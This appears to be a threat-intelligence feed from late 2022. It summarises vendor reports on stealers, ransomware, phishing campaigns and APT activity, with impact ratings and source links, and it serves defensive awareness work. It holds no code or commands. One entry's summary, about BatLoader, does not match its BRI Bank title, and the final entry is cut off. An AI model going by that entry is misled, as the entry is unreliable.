- Elastic Security Labs identified 12 clusters of activity using a similar TTP of threading Base64 encoded strings with Unicode icons to load the YIPPHB dropper. YIPPHB is an unsophisticated, but effective, dropper used to deliver RAT implants going back at least May of 2022.
Source:
https://www.elastic.co/es/security-labs/doing-time-with-the-yipphb-dropper
—
- Intel Source:
- Cyble
- Intel Name:
- New_Malware_Strain_DuckLogs
- Date of Scan:
- 2022-12-01
- Impact:
- LOW
- Summary:
- Recently, Cyble researchers bserved a new malware strain named DuckLogs, which performs multiple malicious activities such as Stealer, Keylogger, Clipper, Remote access, etc. DuckLogs is MaaS (Malware-as-a-Service). It steals users’ sensitive information, such as passwords, cookies, login data, histories, crypto wallet details, etc., and exfiltrates the stolen data from the victim’s machine to its C&C server.
Source:
https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild/
—
- Intel Source:
- Cyble
- Intel Name:
- The_distribution_of_Redline_Stealer
- Date of Scan:
- 2022-12-01
- Impact:
- LOW
- Summary:
- Recently Cyble rsearchers identified 6 phishing sites impersonating Express VPN that was distributing Windows malware. The threat actorstried to use phishing emails, online ads, SEO attacks, and various other means to propagate links over the internet.
Source:
https://blog.cyble.com/2022/11/30/redline-stealer-being-distributed-via-fake-express-vpn-sites/
—
- Intel Source:
- Cyber Florida
- Intel Name:
- Arechclient2_remote_access_trojan
- Date of Scan:
- 2022-12-01
- Impact:
- LOW
- Summary:
- Cyber Florida has observed network payload data obfuscated via Base64 encoding and sent to what appears to be a command control server. The command and control server appears to be utilizing Google cloud services
—
- Intel Source:
- Sophos
- Intel Name:
- Improved_LockBit_3_0_Black_attacks_with_more_capabilities
- Date of Scan:
- 2022-11-30
- Impact:
- MEDIUM
- Summary:
- A Sophos team did some analysis of multiple incidents where attackers used the latest version of LockBit ransomware (known variously as LockBit 3.0 or ‘LockBit Black’) and they discovered the latest tooling used by threat actors. The threat actors have begun experimenting with the use of scripting that would allow the malware to “self-spread” using Windows Group Policy Objects (GPO) or the tool PSExec, potentially making it easier for the malware to laterally move and infect computers without the need for affiliates to know how to take advantage of these features for themselves.
—
- Intel Source:
- Cyble
- Intel Name:
- The_ransomware_impact_on_Aviation_Industry
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- This month the ‘Daixin Team’ ransomware group claimed to infiltrate the networks of a Malaysia-based airline. The group allegedly stole 5 million passengers’ data, and airline employees’ personal and corporate information. ‘Daixin Team’ ransomware group came into existence in June 2022 and has claimed responsibility for targeting 5 organizations so far. In the US, the group has primarily affected Healthcare organizations.
Source:
https://blog.cyble.com/2022/11/23/aviation-industry-facing-ransomware-headwinds/
—
- Intel Source:
- ASEC
- Intel Name:
- Domains_Used_for_Magniber_Distribution_in_Korea
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- The ASEC analysis team introduced through a blog post the Magniber ransomware which attempted MOTW (Mark of the Web) bypassing. Afterward, using the data left in Zone.Identifier, we conducted an investigation on the sources used for the distribution of Magniber.
—
- Intel Source:
- Nozomi Networks
- Intel Name:
- IoT_Botnets_Evade_Detection_and_Analysis_Part_2
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- Nozomi reserachers team analyzed the malware samples and discovered new modification techniques malware authors are using to evade detection. They are also adopting new methods for crafting malicious files, exploiting a variety of vulnerabilities in IoT devices, and using command-and-control (C&C) servers to maintain control of compromised devices.
Source:
https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis-part-2/
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- A_technical_analysis_of_the_Dolphin_backdoor
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- ESET researchers have analyzed a previously unreported backdoor used by the ScarCruft APT group. The backdoor, which was named Dolphin, has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers.
Source:
https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Website_Disguised_as_a_Famous_Korean_Email_Login_Website_Being_Distributed
- Date of Scan:
- 2022-11-30
- Impact:
- LOW
- Summary:
- The ASEC analysis team has identified the distribution of a malicious website in Korea that aims to steal account credentials from a famous Korean email service website.
—
- Intel Source:
- CYJAX
- Intel Name:
- China_Based_Fangxiao_Group_Running_Long_Phishing_Campaign
- Date of Scan:
- 2022-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from CYJAX have observed that a China-based financially motivated group, dubbed Fangxiao, orchestrated a large-scale phishing campaign since 2017. The phishing campaign exploits the reputation of international brands and targets businesses in multiple industries, including retail, banking, travel, and energy. Attackers imitated over 400 organisations, including Emirates, Singapore’s Shopee, Unilever, Indonesia’s Indomie, Coca-Cola, McDonald’s, and Knorr.
Source:
https://www.cyjax.com/2022/11/14/fangxiao-a-chinese-threat-actor/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Massive_malvertising_campaign_capitalize_on_Black_Friday
- Date of Scan:
- 2022-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Malwarebytes have identified an ongoing malvertising campaign has been ramping up a fraudulent campaign via Google ads for the popular Walmart brand. Perhaps due to the upcoming Black Friday shopping deals, we are seeing a dramatic increase in traffic towards a number of malicious sites registered for the purpose of serving tech support scams.
—
- Intel Source:
- DFIR Report
- Intel Name:
- LNK_File_Leads_to_Domain_Wide_Ransomware
- Date of Scan:
- 2022-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from DFIR report have identified threat actor gaining access to an environment via Emotet and operating over a eight day period. During this time period, multiple rounds of enumeration and lateral movement occurred using Cobalt Strike. Remote access tools were used for command and control, such as Tactical RMM and Anydesk.
Source:
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
—
- Intel Source:
- Cyble
- Intel Name:
- New_Variant_Of_Ransomware_Targeting_Chile
- Date of Scan:
- 2022-11-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble have identified a new variant of Punisher ransomware that was spreading through a COVID-19 theme-based phishing website. This Ransomware strain uses a common ransom note which is downloaded from the remote server, and then appends content to the ransom note to make it specific to each of its victims. The figure below shows the HTML file used as a ransom note.
Source:
https://blog.cyble.com/2022/11/25/punisher-ransomware-spreading-through-fake-covid-site/
—
- Intel Source:
- ASEC
- Intel Name:
- Word_Document_Attack_Distributed_in_Disguise_of_a_News_Survey
- Date of Scan:
- 2022-11-29
- Impact:
- LOW
- Summary:
-
The ASEC analysis team discovered that the Word document type identified in the blog, ‘Malicious Word Files Targeting Specific Individuals
Related to North Korea,’ has recently been using FTP to leak user credentials. The filename of the identified Word document is ‘CNA[Q].doc’,
disguised as a CNA Singaporean TV program interview.
—
- Intel Source:
- ASEC
- Intel Name:
- Word_Document_Attack_Distributed_as_Normal_MS_Office_URLs
- Date of Scan:
- 2022-11-29
- Impact:
- LOW
- Summary:
- The ASEC analysis team has discovered during our additional monitoring process that the URL used in the fake Word document is becoming very cleverly disguised to closely resemble the normal URL, and we wish to advise caution on the part of users.
—
- Intel Source:
- ESET Research
- Intel Name:
- The_New_Wave_of_RansomBoggs_Ransomware
- Date of Scan:
- 2022-11-28
- Impact:
- LOW
- Summary:
- Researchers from ESET have identified new ransomware attacks targeting organizations in Ukraine that have been linked to the notorious Russian military threat group Sandworm.
Source:
https://twitter.com/ESETresearch/status/1596181925663760386
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_Ransomware_Being_distributed_With_Similar_Filenames
- Date of Scan:
- 2022-11-28
- Impact:
- LOW
- Summary:
- Researchers from ASEC have observed LockBit 2.0 and LockBit 3.0 are being distributed again with only a change to their filenames.
—
- Intel Source:
- Sucuri
- Intel Name:
- New_Wave_of_SocGholish_Malware
- Date of Scan:
- 2022-11-28
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have observed a new type of WordPress infection where threat actors used a distinguished feature to inject SocGholish malware.
Source:
https://blog.sucuri.net/2022/11/new-wave-of-socgholish-cid27x-injections.html
—
- Intel Source:
- Cloudsek
- Intel Name:
- Diving_Deep_into_Eternity_Stealer
- Date of Scan:
- 2022-11-28
- Impact:
- LOW
- Summary:
- Researchers from CloudSEK have deeply analyzed the workings of Eternity stealer and provided a basic explanation of its techniques and methods.
—
- Intel Source:
- ASEC
- Intel Name:
- Wiki_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-25
- Impact:
- LOW
- Summary:
- ASEC researchers have identified the distribution of Wiki ransomware, which has been determined to be a variant of Crysis ransomware, is disguised as a normal program.
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Targeting_Online_Shoppers_on_Black_Friday
- Date of Scan:
- 2022-11-25
- Impact:
- MEDIUM
- Summary:
- Researchers from FortiGate have observed two Black Friday-oriented cyber-attacks that are gaining traction, one using an old PDF file and another exploiting typosquatting.
—
- Intel Source:
- ASEC
- Intel Name:
- Koxic_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-25
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that Koxic ransomware is being distributed in Korea. Recently, they found that a file with a modified appearance and internal ransom note had been detected.
—
- Intel Source:
- Cofense
- Intel Name:
- Phishing_Attack_Targeting_Microsoft_Users
- Date of Scan:
- 2022-11-24
- Impact:
- LOW
- Summary:
- Researchers from Cofense have analyzed a phishing campaign that is targeted to steal an employee’s Microsoft credentials via a malicious HTML attachment. The attached file includes spliced code when it’s executed it scrapes for the employee’s credentials.
Source:
https://cofense.com/blog/phishing-attack-targets-microsoft-users-via-html-attachment
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Examination_of_Cryptonite_Ransomware
- Date of Scan:
- 2022-11-24
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have analyzed the Cryptonite ransomware kit that exists as free and open-source software.
—
- Intel Source:
- TrendMicro
- Intel Name:
- WannaRen_Ransomware_Targeting_Indian_Organization
- Date of Scan:
- 2022-11-24
- Impact:
- LOW
- Summary:
- Trendmicro researchers have observed the new variant of WannaRen ransomware named Life ransomware and this new variant uses a batch file to download and execute WINWORD.exe to perform DLL side-loading and load the ransomware in memory.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Fake_Shopping_Websites_Running_For_Black_Friday_Sales
- Date of Scan:
- 2022-11-23
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have found a sharp increase in fake shopping-related websites in the run-up to Black Friday sales. Also, warns shoppers to stay alert this Black Friday as hackers launch their own holiday specials.
—
- Intel Source:
- Microsoft
- Intel Name:
- Hackers_Exploiting_Unused_Boa_Web_Servers
- Date of Scan:
- 2022-11-23
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have observed that the intrusion activity aimed at Indian power grid entities earlier this year probably exploited security flaws in the now-discontinued web server Boa.
—
- Intel Source:
- Zscaler
- Intel Name:
- Fake_FIFA_World_Cup_Streaming_Sites_Targeting_Virtual_Fans
- Date of Scan:
- 2022-11-23
- Impact:
- HIGH
- Summary:
- Researchers from Zscaler have identified the FIFA World Cup 2022 has brought with it a spike in cyber attacks targeting football fans through fake streaming sites and lottery scams, leveraging the rush and excitement around these uncommon events to infect users with malware.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- New_Variant_of_RansomExx_Ransomware
- Date of Scan:
- 2022-11-23
- Impact:
- LOW
- Summary:
- IBM security intelligence researchers have discovered a new variant of the RansomExx ransomware that has been rewritten in the Rust programming language. Malware written in Rust often benefits from lower AV detection rates and this may have been the primary reason to use of the language.
Source:
https://securityintelligence.com/posts/ransomexx-upgrades-rust/
—
- Intel Source:
- Cybereason
- Intel Name:
- Black_Basta_Ransomware_Usin_Qakbot_Malware_to_Target_US_Companies
- Date of Scan:
- 2022-11-23
- Impact:
- LOW
- Summary:
- Researchers from Cybereason have identified the Black Basta ransomware gang is using QakBot malware to create an initial point of entry and move laterally within an organization’s network.
—
- Intel Source:
- Avast
- Intel Name:
- Hackers_Leveraging_Chrome_Extension_to_Steal_Cryptocurrency_and_Passwords
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Avast have identified an information-stealing Google Chrome browser extension named ‘VenomSoftX’ which is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web.
Source:
https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IoCs_of_Donot_APT_group
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Rewterz Identified various attack campaigns from Donot APT group targetting Pakistan and other Asian countries. The most recent campaign leverages RTF documents spread through Phishing.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-donot-apt-group-active-iocs-44
—
- Intel Source:
- Sekoia
- Intel Name:
- Rapidly_Increasing_Aurora_InfoStealer_Malware
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Sekoia have identified cybergangs are increasingly turning to a new Go-based information stealer named ‘Aurora’ to steal sensitive information from browsers and cryptocurrency apps, exfiltrate data directly from disks, and load additional payloads.
Source:
https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/
—
- Intel Source:
- PaloAlto
- Intel Name:
- DoubleZero_Wiper
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have introduce a machine learning model that predicts the maliciousness of .NET samples based on specific structures in the file, by analyzing a .NET wiper named DoubleZero.
Source:
https://unit42.paloaltonetworks.com/doublezero-net-wiper/
—
- Intel Source:
- Netskope
- Intel Name:
- Hackers_Leveraging_Adobe_Acrobat_For_Phishing_Attack
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Researchers from Netskope have discovered a phishing campaign that is abusing Adobe Acrobat to host a Microsoft Office phishing page.
Source:
https://www.netskope.com/blog/cloud-abuse-new-technique-using-adobe-acrobat-to-host-phishing
—
- Intel Source:
- Securonix
- Intel Name:
- QakBot_Malware_New_Initial_Execution
- Date of Scan:
- 2022-11-22
- Impact:
- MEDIUM
- Summary:
- Reseacherers from Securonix shared their observation of recent version of the QakBot, aka Qbot, malware where calls to the Windows binary Regsvr32 are obfuscated in creative ways.
Source:
https://www.securonix.com/blog/qbot-qakbot-malwares-new-initial-execution/
—
- Intel Source:
- Zscaler
- Intel Name:
- Hackers_Are_Active_Again_For_Festival_Season
- Date of Scan:
- 2022-11-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Zscaler have observed four emerging skimming attacks targeting e-commerce stores. These skimming campaigns have a long shelf life and manage to keep their malicious activities under the radar for several months.
—
- Intel Source:
- Cyble
- Intel Name:
- The_browser_hijacking_by_multiple_Chrome_extensions
- Date of Scan:
- 2022-11-22
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs (CRIL) discovered multiple Chrome extensions that compromised over two million users with Browser Hijackers. All the extensions that they found were present on the Chrome web store. After installation, it was observed that the browsers hijackers were also changing the browser’s default search engine without the users’ knowledge.
Source:
https://blog.cyble.com/2022/11/22/over-2-million-users-affected-with-browser-hijackers/
—
- Intel Source:
- Talos
- Intel Name:
- New_Improved_Versions_of_LodaRAT
- Date of Scan:
- 2022-11-21
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have identified several variants and altered versions of LodaRAT with updated functionality and including new functionality allowing proliferation to attached removable storage, a new string encoding algorithm, and the removal of “dead” functions.
Source:
https://blog.talosintelligence.com/get-a-loda-this/?&web_view=true
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Fake_Antivirus_Phishing_Campaign
- Date of Scan:
- 2022-11-21
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the phishing email which looks a like McAfee antivirus subscription.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Wave_of_Ransomware_Campaigns
- Date of Scan:
- 2022-11-21
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified three new ransomware families: AXLocker, Octocrypt, and Alice Ransomware. They are not only encrypting victims files and demanding a ransom payment but also stealing the Discord accounts of infected users.
—
- Intel Source:
- Trellix
- Intel Name:
- Hackers_Leveraging_FIFA_World_Cup_For_Phishing_Attack
- Date of Scan:
- 2022-11-21
- Impact:
- HIGH
- Summary:
- Researchers from Trellix have observed attackers leveraging FIFA and football-based campaigns to target organizations in Arab countries.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Preta_Hackers_Targeting_Governments_Worldwide
- Date of Scan:
- 2022-11-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Trendmicro have observed that the Threat group Earth Preta targets worldwide Governments via a Spear-phishing attack. They abused fake Google accounts to distribute the malware via spear-phishing emails, initially stored in an archive file (such as rar/zip/jar) and distributed through Google Drive links.
Source:
https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html
—
- Intel Source:
- Akamai
- Intel Name:
- Phishing_Attack_Leveraging_Famous_Brands_to_Targeting_US_shoppers
- Date of Scan:
- 2022-11-18
- Impact:
- MEDIUM
- Summary:
- Akamai researchers have identified a sophisticated phishing kit that is targeting North Americans since mid-September, using lures focused on holidays like Labor Day and Halloween.
Source:
https://www.akamai.com/blog/security-research/sophisticated-phishing-scam-abusing-holiday-sentiment
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_Analysis_of_2022_FIFA_World_Cup_Threat
- Date of Scan:
- 2022-11-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Recorded Future have analyzed the threat landscape ahead of the 2022 FIFA World Cup hosted in Qatar that begins on November 20, 2022.
—
- Intel Source:
- Checkmarx Security
- Intel Name:
- W4SP_Stealer_Targeting_Python_Developers
- Date of Scan:
- 2022-11-18
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx Security have identified an ongoing supply chain attack that is leveraging malicious Python packages to distribute malware called W4SP Stealer, with over hundreds of victims ensnared to date.
—
- Intel Source:
- CISA
- Intel Name:
- Hive_ransomware_extorted_100M_from_over_1300_victims
- Date of Scan:
- 2022-11-18
- Impact:
- MEDIUM
- Summary:
- Researchers from FBI have identified that the notorious Hive ransomware gang has successfully extorted roughly $100 million from over a thousand companies since June 2021. Also, the FBI says that the Hive gang will deploy additional ransomware payloads on the networks of victims who refuse to pay the ransom.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Diving_Deep_into_Venus_Ransomware
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne have analyzed the Venus ransomware and provided further analysis, indicators of compromise, and TTPs.
—
- Intel Source:
- CADO Security
- Intel Name:
- WatchDog_Continues_to_Targeting_East_Asian_CSPs
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- Researchers from Cado Labs have discovered the re-emergence of the threat actor WatchDog. This is an opportunistic and prominent threat actor, who is known for routinely carrying out cryptojacking attacks against resources hosted by various Cloud Service Providers.
Source:
https://www.cadosecurity.com/watchdog-continues-to-target-east-asian-csps/
—
- Intel Source:
- Cofense
- Intel Name:
- Phishing_Campaign_Abusing_MS_Customer_Voice_URLs
- Date of Scan:
- 2022-11-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Cofense have observed phishing campaigns abusing Microsoft Customer Voice URLs. Microsoft Customer Voice is a customer engagement/survey service that is used for plenty of benign and useful reasons.
Source:
https://cofense.com/blog/microsoft-customer-voice-urls-used-in-latest-phishing-campaign
—
- Intel Source:
- Krebon Security
- Intel Name:
- The_Disneyland_Malware_Team_activity
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- A cybercrime group calling itself the Disneyland Team has been operating dozens of phishing domains that spoof popular bank brands since March 2022. the Disneyland Team has been making liberal use of visually confusing phishing domains that spoof popular bank brands using Punycode, an Internet standard that allows web browsers to render domain names with non-Latin alphabets like Cyrillic.
—
- Intel Source:
- Blackberry
- Intel Name:
- ARCrypter_Ransomware_Spreading_From_Latin_America_to_the_World
- Date of Scan:
- 2022-11-17
- Impact:
- MEDIUM
- Summary:
- Researchers from BlackBerry have identified additional samples of interest for ARCrypter ransomware and expanded its operations from Latin America to the World. Based on the unique strings identified during the analysis, they have named this unknown ransomware variant “ARCrypter”.
—
- Intel Source:
- Fortinet
- Intel Name:
- Debugging_DotNET_Malware
- Date of Scan:
- 2022-11-17
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have described how we can create a custom .NET program to help debug a DLL loaded and invoked directly in memory.
—
- Intel Source:
- Trellix
- Intel Name:
- An_Examination_of_Wiper_Families
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- Researchers from Trellix have analyzed more than twenty recent wiper families, their trends, techniques, and their overlap with other wipers.
—
- Intel Source:
- McAfee
- Intel Name:
- Advantage_of_FTX_Bankruptcy_by_threat_actors
- Date of Scan:
- 2022-11-17
- Impact:
- LOW
- Summary:
- McAfee has discovered several phishing sites targeting FTX users. One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and they would likely transfer all the funds out of it.
—
- Intel Source:
- Vmware
- Intel Name:
- Diving_Deep_into_Downloader_Malware
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from VMware have analyzed the evasive downloader malware campaigns, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware.
Source:
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html
—
- Intel Source:
- CISA
- Intel Name:
- Iranian_hackers_breached_federal_agency_using_Log4Shell_exploit
- Date of Scan:
- 2022-11-16
- Impact:
- HIGH
- Summary:
- The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware.
—
- Intel Source:
- Securelist
- Intel Name:
- North_Korean_hackers_target_European_organization
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from Securelist have identified North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America.
Source:
https://securelist.com/dtrack-targeting-europe-latin-america/107798/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_HTTP_CONNECT_malicious_requests
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed and identified the HTTP CONNECT requests may have been an attempt to relay traffic through the honeypot and hide the original source of the request. It is also possible that the traffic may have been funneled through multiple proxy endpoints to make identification of the source difficult to identify. Allowing HTTP CONNECT on internet facing resources can potentially expose internal network resources or assist in the forwarding of malicious traffic.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Heodo_Malware
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Heodo Malware. It is a malicious program that is a variant of Emotet.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-an-emerging-heodo-malware-active-iocs
—
- Intel Source:
- Proofpoint
- Intel Name:
- Emotet_Delivering_via_Malicious_Email
- Date of Scan:
- 2022-11-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Proofpoint have observed multiple changes to Emotet and its payloads including the lures used, and changes to the Emotet modules, loader, and packer.
Source:
https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return
—
- Intel Source:
- PaloAlto
- Intel Name:
- Typhon_Stealer_Back_With_New_Capabilities
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have identified that Typhon Stealer provides threat actors with an easy-to-use, configurable builder for hire. They are continuing to update their code to enhance their tools and techniques to evade security systems and exfiltrate data smoothly.
Source:
https://unit42.paloaltonetworks.com/typhon-reborn-stealer/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_RapperBot_Campaign
- Date of Scan:
- 2022-11-16
- Impact:
- MEDIUM
- Summary:
- Fortinet reserachers observed new samples with the same distinctive C2 protocol used by RapperBot were detected. in August 2022, there was a significant drop in the number of samples collected in the wild. It is quickly evident that these samples are part of a separate campaign to launch Distributed Denial of Service (DDoS) attacks against game servers. With the several similarities between previous and present it is believed that either the same threat actor might be behind both campaigns or each campaign might have branched from the same privately-shared source code.
Source:
https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks
—
- Intel Source:
- ASEC
- Intel Name:
- Dagon_Locker_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2022-11-16
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the DAGON LOCKER ransomware is being distributed in Korea. It is commonly distributed through phishing mails or as an attachment to emails, but because it is a ransomware-as-a-service, the distribution route and target can vary according to the threat actor.
—
- Intel Source:
- Intezer
- Intel Name:
- Hackers_Abusing_LNK_Files
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Intezer researchers have described how threat actors use LNK files in the different stages of attacks.
Source:
https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_REvil_Ransomware
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of REvil Ransomware. It is (also known as Sodinokibi) a Ransomware-as-a-Service (RaaS).
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-revil-ransomware-active-iocs-20
—
- Intel Source:
- DFIR Report
- Intel Name:
- Hackers_Leveraging_BumbleBee_to_Load_Meterpreter_and_CobaltStrike
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from DFIR report have identified threat actors leveraged BumbleBee to load a Meterpreter agent and Cobalt Strike Beacons.
Source:
https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_Hackers_Targeting_Government_Agencies
- Date of Scan:
- 2022-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have identified a cyberespionage threat actor tracked as Billbug (a.k.a. Thrip, Lotus Blossom, Spring Dragon) has been running a campaign targeting a certificate authority, government agencies, and defense organizations in several countries in Asia.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_SharpPanda_APT_Group
- Date of Scan:
- 2022-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of SharpPanda APT Group. SharpPanda APT attacks and targets Southeast Asian government users with template injection of malicious documents. The attackers use spear-phishing to gain initial access and leverage old Microsoft Office vulnerabilities together with the chain of in-memory loaders to attempt and install a previously unknown backdoor on the victim’s machines.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-sharppanda-apt-group-active-iocs
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Phobos_Ransomware
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Phobos ransomware. It is based on the Dharma malware that first appeared at the beginning of 2019.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-phobos-ransomware-active-iocs-27
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_Deep_Examination_of_Prestige_Ransomware
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Cyfirma have analyzed the Prestige Ransomware.
Source:
https://www.cyfirma.com/outofband/prestige-ransomware-analysis/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Black_Basta_Ransomware
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Black Basta Ransomware. It is a new ransomware that encrypts data stored on clients’ hard drives.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-black-basta-ransomware-active-iocs-5
—
- Intel Source:
- TrendMicro
- Intel Name:
- New_Earth_Longzhi_APT_Targeting_Ukraine_and_Asian_Countries
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro have observed that threat group Earth Longzhi targeting Ukraine and Asian countries with custom Cobalt Strike loaders.
—
- Intel Source:
- Cyble
- Intel Name:
- Indonesian_BRI_Bank_targeted_by_phishing_campaigns
- Date of Scan:
- 2022-11-15
- Impact:
- LOW
- Summary:
- VMware Carbon Black Managed Detection and Response (MDR) analysts have identified a threat that has been circuling over the last couple of months BatLoader. BatLoader is an initial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. The analysts sharing their analyses about this malware campaign, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware.
Source:
https://blog.cyble.com/2022/11/15/phishing-campaign-targeting-indonesian-bri-bank-using-sms-stealer/
—
- Intel Source:
- Sucuri
- Intel Name:
- Massive_oisDOTis_Black_Hat_Redirect_Malware_Campaign
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have identified that ois[.]is Black Hat redirecting to the malware campaign. These malicious redirects appear to be designed to increase the authority of the attacker’s sites for search engines.
Source:
https://blog.sucuri.net/2022/11/massive-ois-is-black-hat-redirect-malware-campaign.html
—
- Intel Source:
- Talos
- Intel Name:
- Cyber_adoption_of_IPFS_for_different_malware_campaigns
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- Cisco Talos has observed multiple ongoing campaigns that leverage the IPFS network to host their malware payloads and phishing kit infrastructure while facilitating other attacks.
—
- Intel Source:
- ASEC
- Intel Name:
- Dropper_Type_Malware_Bomb_Back_Again
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
- ASEC researchers found that dropper malware, which disguised itself as a crack, is being actively distributed again. Once the malware is executed, the affected system becomes infected with numerous malware programs.
—
- Intel Source:
- QuickHeal
- Intel Name:
- QBOT_Leveraging_HTML_Smuggling_Technique
- Date of Scan:
- 2022-11-14
- Impact:
- LOW
- Summary:
